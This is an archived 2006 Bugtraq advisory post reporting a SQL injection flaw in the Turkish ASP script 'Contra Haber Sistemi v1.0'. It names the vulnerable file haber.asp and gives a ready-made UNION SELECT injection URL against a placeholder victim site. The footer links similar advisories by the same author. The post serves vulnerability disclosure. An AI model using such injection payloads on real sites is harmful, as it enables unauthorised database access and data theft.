Contra Haber Sistemi v1.0 SqL Injection Vuln.

From: ShaFuq31@xxxxxxxxxxx
Date: 16 Dec 2006 15:50:27 -0000

# LiderHack.Org & BhhGroup.Org

# script name : Contra Haber Sistemi v1.0

# Script Download : http://www.maxiasp.com/scriptler/Haber_Sistemi.rar

# Risk : High

# Found By : ShaFuck31

# Thanks : | Dekolax | The RéD | CyBorG | DesquneR | f1r3b0y | BaZaL | SaboTaqe | ST@ReXT | BLaSTER | B1G B0SS | UNiKnoX |

# Vulnerable file : haber.asp

#Vulnerable :

Vulnerable -----> http://victim.com/[path to script]/haber.asp?id=[SqL]
Vulnerable ----->http://victim.com/[path to script]/haber.asp?id=-1%20union%20select%20*%20from%20haberler%20where%20id=82

#Contact: ShaFuq31 (at) HoTMaiL (dot) CoM [email concealed]

Prev by Date: Re: Re: Flaw in OpenOffice.org 2.1: OpenOffice 2.1 is vulnerable to MS Word 0 day vulnerability!!!
Next by Date: [HSC Security Group] SiteCatalyst Web Login Cross Site Vulrnabilities
Previous by thread: Odysseus 2.0 / Telemachus 1.0 (Beta)
Next by thread: [HSC Security Group] SiteCatalyst Web Login Cross Site Vulrnabilities
Index(es):
- Date
- Thread

Relevant Pages

GeoBB Georgian Bulletin Board Remote File Include Vuln.
... # Risk: High ... # Found By: ShaFuck31 ... Vuln. ...
(Bugtraq)
Aspee Ziyareti Defteri (tr) Sql injection Vuln.
... # Risk: High ... # Found By: ShaFuck31 ... Go to Admin Panel Login -----> http://victim.com//admin.asp ...
(Bugtraq)
Metyus Okul Ynetim Sistemi V.1.0 (tr) Sql injection Vuln.
... # Risk: High ... # Found By: ShaFuck31 ... # Vulnerable file: uye_giris_islem.asp ... Go to Admin Panel Login -----> http://victim.com//default.asp ...
(Bugtraq)
Doğantepe Ziyareti Defteri (tr) Sql Injection Vuln.
... # Risk: High ... # Found By: ShaFuck31 ... Go to Admin Panel Login -----> http://victim.com//admin.asp ...
(Bugtraq)
Okul Merkezi Portal v1.0 Remote File IncLude Vuln.
... # GoogLe Dork: ogrencimezunlar.php ... # Risk: High ... # Found By: ShaFuck31 ... # Vulnerable file: ataturk.php ...
(Bugtraq)